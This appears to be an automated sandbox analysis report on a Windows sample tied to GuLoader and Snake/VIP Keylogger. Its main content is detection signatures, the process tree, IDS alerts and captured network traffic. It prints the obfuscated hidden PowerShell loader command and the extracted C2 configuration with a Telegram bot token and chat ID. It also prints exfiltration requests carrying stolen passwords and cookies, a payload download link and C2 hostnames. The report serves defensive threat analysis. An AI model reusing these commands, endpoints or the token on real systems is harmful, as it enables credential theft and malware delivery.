Edit tour

Windows Analysis Report
Azygoses125.exe

Overview

General Information

Sample name:	Azygoses125.exe
Analysis ID:	1580088
MD5:	723e8d7420209e5658d32ebeaea45b9c
SHA1:	1fab08989ece01ecd3f485d33a921dd553ccc393
SHA256:	29807b7bbe150c4005266b07919615984fcc9dec19052ae262374635024c9e2b
Tags:	exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Azygoses125.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\Azygoses125.exe" MD5: 723E8D7420209E5658D32EBEAEA45B9C)

powershell.exe (PID: 7824 cmdline: powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5500 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.1530729050.0000000008D47000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 5500	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 5500	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5500, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49751

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7824, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) ", CommandLine: powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Azygoses125.exe", ParentImage: C:\Users\user\Desktop\Azygoses125.exe, ParentProcessId: 7712, ParentProcessName: Azygoses125.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) ", ProcessId: 7824, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T21:51:03.616489+0100	2803305	3	Unknown Traffic	192.168.2.7	49804	104.21.67.152	443	TCP
2024-12-23T21:51:11.379165+0100	2803305	3	Unknown Traffic	192.168.2.7	49823	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T21:50:52.410774+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:50:57.985456+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:01.472995+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:01.988941+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49772	132.226.8.169	80	TCP
2024-12-23T21:51:05.176483+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49809	132.226.8.169	80	TCP
2024-12-23T21:51:09.498771+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49817	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T21:50:42.138306+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49751	172.217.19.174	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T21:51:33.808019+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49884	149.154.167.220	443	TCP
2024-12-23T21:51:37.675526+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49895	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T21:51:25.920925+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49866	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
Source: msiexec.exe.5500.9.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: Azygoses125.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Azygoses125.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49782 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49866 version: TLS 1.2

Source: Azygoses125.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.1528725368.0000000008043000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405974
Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_004064C6 FindFirstFileW,FindClose,	3_2_004064C6
Source: C:\Users\user\Desktop\Azygoses125.exe	Code function: 3_2_004027FB FindFirstFileW,	3_2_004027FB

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00A3F2EDh	9_2_00A3F150
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00A3F2EDh	9_2_00A3F3BF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00A3F2EDh	9_2_00A3F33C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00A3FAA9h	9_2_00A3F804

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49866 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49884 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49895 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2024/12/2024%20/%2015:16:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24aa9531a714Host: api.telegram.orgContent-Length: 568
Source: global traffic	HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24d391d1b18fHost: api.telegram.orgContent-Length: 1265

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49772 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49809 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49817 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49804 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49751 -> 172.217.19.174:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49782 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2024/12/2024%20/%2015:16:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24aa9531a714Host: api.telegram.orgContent-Length: 568

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 23 Dec 2024 20:51:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000009.00000002.2530233979.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2328151794.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.1528725368.0000000008043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: msiexec.exe, 00000009.00000003.1568695480.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1627272571.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.1568749006.0000000000B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.
Source: Azygoses125.exe, Azygoses125.exe.5.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.1521930295.00000000058BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1519110053.0000000004851000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000009.00000002.2547152086.00000000219B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2547152086.0000000021CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.1519110053.0000000004851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.1519110053.00000000049A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000009.00000002.2545503931.0000000020A7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
